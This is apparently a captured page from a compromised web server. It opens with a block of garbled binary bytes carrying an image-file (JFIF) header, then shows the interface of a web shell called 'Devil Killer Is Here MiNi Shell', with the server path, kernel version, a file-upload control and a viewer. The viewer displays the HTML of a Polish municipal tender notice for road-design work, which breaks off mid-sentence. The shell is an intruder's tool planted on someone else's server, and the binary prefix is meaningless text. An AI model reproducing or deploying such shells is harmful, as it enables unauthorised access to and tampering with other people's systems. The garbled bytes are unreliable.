JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240705/0039909501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projektowej. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto i Gmina Piotrków Kujawski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866666</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kościelna 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piotrków Kujawski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">88-230</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zpos@piotrkowkujawski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.piotrkowkujawski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowej. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b4d12dea-3aaf-11ef-b37c-4e696a6d8c25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00399095</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00036593/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Wykonanie dokumentacji projektowej na zadanie inwestycyjne pn: Przebudowa ul. Dworcowej w Piotrkowie Kujawskim</p> <p class="mb-0">1.3.5 Wykonanie dokumentacji projektowej na zadanie inwestycyjne pn: Przebudowa drogi w rejonie ul. Chabrowej w Piotrkowie Kujawskim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://piotrkowkujawski.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy zakupowej pod adresem: https://piotrkowkujawski.ezamawiajacy.pl, zwanej dalej<br/>Platformą.<br/>Uwaga! Przed przystąpieniem do składania oferty, wykonawca jest zobowiązany zapoznać się z Instrukcją korzystania z Platformy<br/>zakupowej. Instrukcja została zamieszona bezpośrednio na ww. Platformie.<br/>Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej.<br/>2. Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy e-Zamawiający,<br/>Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego pod numerem telefonu: +48 22 257 22 23, e-mail:<br/>oneplace.admin@marketplanet.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1 Oferta wraz z załącznikami musi zostać sporządzona w języku polskim i złożona w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem osobistym lub podpisem zaufanym pod rygorem nieważności. Złożenie oferty wymaga od wykonawcy zarejestrowania się i zalogowania na<br/>Platformie zakupowej zamawiającego dostępnej pod adresem https://piotrkowkujawski.ezamawiajacy.pl.<br/>Wykonawca może złożyć jednorazowo maksimum 15 plików.<br/>• Dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES;<br/>• Jeżeli w wyniku podpisywania pliku kwalifikowanym podpisem elektronicznym, podpisem osobistym lub profilem zaufanym zostanie<br/>utworzony dodatkowy plik z podpisem, Wykonawca jest zobowiązany przekazać Zamawiającemu oba pliki (plik podpisywany i plik z<br/>podpisem).<br/>2. Oferta wraz z załącznikami powinna być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze sądowym lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy, albo przez osobę umocowaną (na podstawie pełnomocnictwa) przez osoby uprawnione.<br/>3. Oferty należy złożyć na platformie pod adresem:<br/>https://piotrkowkujawski.ezamawiajacy.pl w zakładce „ OFERTY” do dnia 12.07.2024 r. do godz. 10.00.<br/>4. Wykonawca winien opisać załącznik nazwą umożliwiającą jego identyfikację.<br/>5. Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji, które Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa, powinny zostać złożone w osobnym pliku wraz z jednoczesnym zaznaczeniem polecenia „Tajne&#34;. Wczytanie załącznika następuje poprzez polecenie „Dodaj&#34;.<br/>Wykonawca załączając dokument oznacza, czy jest on: „Tajny” – dokument stanowi „tajemnice przedsiębiorstwa” lub opcję „Jawny”<br/>– niestanowiący tajemnicy przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 roku o zwalczaniu nieuczciwej<br/>konkurencji. Wczytanie oferty wraz z załącznikami następuje poprzez polecenie „Złóż ofertę&#34;. Potwierdzeniem prawidłowo złożonej Oferty jest komunikat systemowy „Oferta złożona poprawnie”. O terminie złożenia Oferty decyduje czas pełnego przeprocesowania transakcji na platformie. Po zapisaniu, plik jest w Systemie o którym mowa w pkt.1 zaszyfrowany.<br/>6. Wykonawca może przed upływem terminu do składania ofert zmienić lub wycofać ofertę złożoną przez siebie ofertę. W tym celu w zakładce „OFERTY&#34; należy zaznaczyć ofertę, a następnie wybrać polecenie „wycofaj ofertę”.<br/>7. Po upływie terminu składania ofert, dodanie Oferty (załączników), wycofanie oferty nie będzie możliwe.<br/>8. Wykonawca ma prawo złożyć tylko jedną ofertę. Oferty wykonawcy, który przedłoży więcej niż jedną ofertę, zostaną odrzucone.<br/>9. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach zgodnych z rozporządzeniem Rozporządzenie Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemów teleinformatycznych (t. j. Dz. U. z 2017 r. poz. 2247). Wykonawca może złożyć jednorazowo maks. 15 plików.<br/>10. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich wczytania do Platformy https://piotrkowkujawski.ezamawiajacy.pl<br/>11. Zamawiający wskazuje zalecane informacje, o których mowa w Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych, dotyczące systemu dostępnego pod adresem https://piotrkowkujawski.ezamawiajacy.pl (pkt XIII i XIV SWZ).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe informacje znajdują się w punkcie II SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowe informacje znajdują się w punkcie II SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.8.2024.TC</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I. Część I zamówienia: Przebudowa ul. Dworcowej w Piotrkowie Kujawskim.<br/>1.	Przedmiotem zamówienia jest wykonanie dokumentacji projektowej na niżej wymienione zadanie inwestycyjne pn.: Przebudowa ul. Dworcowej w Piotrkowie Kujawskim - droga gminna nr 181071C od km 0+000 do km 2+400.<br/>2.	Przedmiot zamówienia obejmuje wykonanie kompletnego opracowania projektu budowlano-wykonawczego przebudowy w/w drogi wraz z odwodnieniem ( wykonanie kanalizacji deszczowej). <br/>3.	Wykonawca przedstawi Zamawiającemu do zaakceptowania proponowaną koncepcję przebudowy ulicy lub uzgodni z Zamawiającym zakres opracowania w terminie do 2 miesięcy od podpisania umowy.<br/>4. Dokumentacja na w/w zakres winna składać się z niżej wymienionych elementów:<br/>a)	Mapa do celów projektowych (1 egz. z klauzulą dla Zamawiającego + egzemplarze dla potrzeb projektowania),<br/>b)	Projekt budowlany w tym: projekt zagospodarowania terenu, projekt architektoniczno-budowlany, projektu technicznego, załączników do projektu budowlanego (opinii, uzgodnień, pozwoleń, oświadczeń, informacji i innych dokumentów), (5 egz.),<br/>c)	Projekt techniczny (5 egz.),<br/>d)	Operat wodnoprawny – jeżeli dotyczy (4 egz.),<br/>e)	Projekt stałej organizacji ruchu (4 egz.),<br/>f)	Specyfikacje techniczne wykonania i odbioru robót budowlanych dla każdej branży (2 egz.),<br/>g)	Przedmiar robót oraz kosztorys ofertowy dla każdej branży z podziałem na 3 etapy (2 egz.),<br/>h)	Kosztorys inwestorski dla każdej branży z podziałem na 3 etapy (2 egz.),<br/>i)	Wniosek o wydanie pozwolenia na budowę (1 komplet),<br/>j)	uzyskanie i zbiór niezbędnych badań, opinii, uzgodnień, zgód, pozwoleń i decyzji a także innych dokumentów technicznych związanych z inwestycją (element składowy projektu budowlanego) niezbędnych do uzyskania pozwolenia na budowę ( np.: złożenie wniosku i uzyskanie decyzji o warunkach zabudowy lub decyzji o lokalizacji inwestycji celu publicznego, decyzji środowiskowej, pozwoleń i zgód wodno-prawnych, itp.)<br/>k)	Wykonawca dostarczy także Zamawiającemu kompletną dokumentację zarchiwizowaną na płytach CD/DVD lub pendrive w dwóch egzemplarzach. <br/>5.	Zakres zadań będących przedmiotem zamówienia dodatkowo obejmuje:<br/>a)Udzielania pisemnych wyjaśnień na zapytanie oferentów w sprawach opracowanej dokumentacji kosztorysowej oraz sprawdzenie kosztorysów ofertowych w złożonych ofertach w trakcie prowadzonego później postępowania przetargowego na wybór wykonawcy robót obejmujących swym zakresem opracowana dokumentację.<br/>b)Współpracę realizacyjną z Wykonawcą i inspektorem nadzoru inwestorskiego do czasu zakończenia robót budowlanych. <br/>6.	Wykonawca zobowiązuje się zrealizować przedmiot zamówienia zgodnie z warunkami wynikającymi z obowiązujących przepisów prawa, wymaganiami wynikającymi z obowiązujących Polskich Norm i aprobat technicznych zasadami rzetelnej wiedzy technicznej i ustalonymi zwyczajami.<br/>II.	Przed przystąpieniem do projektowania Wykonawca dokona, przy udziale Zamawiającego, wizji w terenie.<br/>III.	Wykonawca pozyska we własnym zakresie wszelkie niezbędne materiały potrzebne do opracowania dokumentacji projektowo-kosztorysowej.<br/>IV.	Sporządzona dokumentacja musi zawierać wymagane uzgodnienia urzędowe i branżowe.<br/>V.	Wykonawca dokona, w ramach wynagrodzenia o którym mowa w § 5, uzgodnień branżowych z gestorami sieci zlokalizowanych na terenach objętych dokumentacjami w granicach projektowanego pasa drogowego, w tym uzgodnień na Naradzie Koordynacyjnej, o której mowa w art. 28b ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne.<br/>VI.	Rozwiązania przyjęte w dokumentacjach oraz zaproponowane do zastosowania urządzenia będą musiały odpowiadać wymogom zapewnienia dostępności osobom ze szczególnymi potrzebami.<br/>VII.	W przypadku konieczności uzyskania innych materiałów niezbędnych do opracowania dokumentacji projektowej bądź uzyskania nie wymienionych warunków, opracowań, pozwoleń, operatów, uzgodnień, opinii, zatwierdzeń Wykonawca zobowiązany jest je pozyskać na własny koszt.<br/>VIII. Wersja elektroniczna musi zawierać w szczególności wszystkie elementy projektu budowlanego. <br/>IX.	Wykonawca razem z dokumentacją elektroniczną złoży oświadczenie o zgodności wersji elektronicznej z przekazaną wersją oryginalną (papierową). <br/>X.	Dokumentacja stanowiąca przedmiot umowy, będzie zaopatrzona w wykaz opracowań oraz pisemne oświadczenie Wykonawcy, że jest wykonana zgodnie z umową, obowiązującymi przepisami i normami, jest wzajemnie skoordynowana technicznie we wszystkich branżach oraz, że została wydana w stanie kompletnym z punktu widzenia celu, któremu ma służyć oraz, że wszelkie zmiany i uwagi wniesione na etapie uzgodnień zostały do niej wprowadzone. <br/>XI.	Wykonawca zobowiązany będzie do uzupełnienia i poprawienia egzemplarzy niestanowiących załączników do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej, w zakresie odpowiadającym zmianom dokonanym w dokumentacjach na etapie uzyskiwania ww. decyzji.<br/>XII.	W zależności od zaproponowanych przez Wykonawcę rozwiązań technicznych, wykonanie dokumentacji wymagać będzie również uzyskania przez niego warunków od dostawców mediów. <br/>XIII.	W dokumentacji projektowo-kosztorysowej wykonanej przez Wykonawcę, nie mogą występować nazwy własne materiałów, zgodnie z zasadą, że przedmiotu zamówienia nie można opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i nie można opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy &#34;lub równoważny&#34; oraz minimalne parametry równoważności.<br/><br/>2. Wspólny Słownik Zamówień CPV: 71320000-7 Usługi inżynieryjne w zakresie projektowania. <br/>3. Zamawiający dopuszcza możliwość składania ofert częściowych.<br/>Zamawiający dopuszcza możliwość składania ofert częściowych. Zamówienie składa się z 2 części.<br/>Wykonawca może złożyć ofertę na jedną lub dowolną ilość części wskazanych w SWZ.<br/>4. Zamawiający nie dopuszcza składania ofert wariantowych oraz w postaci katalogów elektronicznych.<br/>5. Zamawiający nie przewiduje możliwość udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp. <br/>6. Szczegółowy opis oraz sposób realizacji zamówienia zawiera SWZ.<br/>Przedmiot zamówienia można opisać przez wskazanie znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę, jeżeli zamawiający nie może opisać przedmiotu zamówienia w wystarczająco precyzyjny i zrozumiały sposób, a wskazaniu takiemu towarzyszą wyrazy &#34;lub równoważny&#34;.<br/>7. Jeżeli udostępniona dokumentacja wskazywałyby w odniesieniu do materiałów lub urządzeń lub rozwiązań znaki towarowe, patenty lub pochodzenie, źródło lub lub usługi dostarczane przez konkretnego wykonawcę, szczególny proces, który charakteryzuje produkty dostarczane przez konkretnego wykonawcę, to zgodnie z art. 99 ust. 5 PZP Zamawiający dopuszcza każdorazowo zaoferowanie materiałów lub urządzeń lub rozwiązań równoważnych. Materiały lub urządzenia pochodzące od konkretnych producentów określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać materiały lub urządzenia oferowane przez wykonawcę, aby zostały spełnione wymagania stawiane przez zamawiającego. Pod pojęciem „minimalne parametry jakościowe i cechy użytkowe” zamawiający rozumie wymagania dotyczące materiałów lub urządzeń zawarte dokumentacji przetargowej, a w przypadku ich braku w ogólnie dostępnych źródłach, katalogach, stronach internetowych producentów. Posługiwanie się przykładowymi nazwami producenta ma jedynie na celu doprecyzowanie poziomu oczekiwań zamawiającego w stosunku do określonego rozwiązania. Posługiwanie się nazwami producentów/produktów ma wyłącznie charakter przykładowy. Zamawiający, wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt przy opisie przedmiotu zamówienia, dopuszcza jednocześnie każdorazowo produkty równoważne o parametrach jakościowych i cechach użytkowych co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych lub lepszych parametrach. Zamawiający zastrzega sobie możliwość uzyskania opinii projektanta dokumentacji odnośnie równoważności zaproponowanego przez Wykonawcę materiału lub urządzenia lub rozwiązania. W przypadku, gdy oferowane przez wykonawcę materiały lub urządzenia będą inne niż opisane w dokumentacji, obowiązek udowodnienia, że odpowiadają one wymaganiom, określonym przez Zamawiającego w dokumentacji, spoczywa na Wykonawcy.<br/>8. Uwagi końcowe<br/>a)	dokumentacje projektowe należy opracować zgodnie i w oparciu o obowiązujące akty prawne, normy, normatywy i wytyczne projektowe, <br/>b)	przed przystąpieniem do projektowania Wykonawca dokona wizji w terenie, <br/>c)	Wykonawca pozyska we własnym zakresie wszelkie niezbędne materiały potrzebne do opracowania dokumentacji, <br/>d)	dokumentacje będą musiały zawierać wymagane uzgodnienia urzędowe i branżowe, <br/>e)	Wykonawca dokona na własny koszt uzgodnień branżowych z gestorami sieci zlokalizowanych na terenach objętych dokumentacjami w granicach projektowanego pasa drogowego, w tym uzgodnień na Naradzie Koordynacyjnej, o której mowa w art. 28b ustawy z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne, <br/>f)	rozwiązania przyjęte w dokumentacjach oraz zaproponowane do zastosowania urządzenia będą musiały odpowiadać wymogom zapewnienia dostępności osobom ze szczególnymi potrzebami, <br/>g)	Wykonawca zapewni na swój koszt sprawdzenie projektów pod względem zgodności z przepisami, o którym mowa w art. 20 ust. 2-3 ustawy z dnia 7 lipca 1994 r. Prawo budowlane. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Nadzór autorski (ilość pobytów)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I. Część II zamówienia: Przebudowa drogi w rejonie ul. Chabrowej w Piotrkowie Kujawskim. <br/> 1.	Przedmiotem zamówienia jest wykonanie dokumentacji projektowej na niżej wymienione zadanie inwestycyjne pn.: Przebudowa drogi w rejonie ul. Chabrowej w Piotrkowie Kujawskim ( dotyczy ul. Chabrowej nr drogi 181068C od km 0+000 do km 0+425, oraz ulicy Gołębiej – nr drogi 181072C od km 0+000 do km 0+ 249 